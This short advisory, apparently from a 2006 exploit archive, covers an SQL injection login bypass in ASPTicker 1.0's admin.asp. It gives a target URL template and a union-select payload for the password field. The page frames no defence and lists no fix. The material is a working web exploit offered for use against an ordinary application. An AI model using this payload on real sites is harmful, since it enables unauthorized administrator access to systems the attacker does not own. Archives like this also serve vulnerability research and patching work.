ASPTicker 1.0 (admin.asp) Login ByPass SQL Injection Vulnerability

2006-12-28 00:00:00

*******************************************************************************
# Title : ASPTicker 1.0 (admin.asp) Remote Login ByPass SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.aspapps.com
# $$ : $ 17.00

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//admin.asp[ByPass]

Example:

//Password} 'union select 0,0,0 from password

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.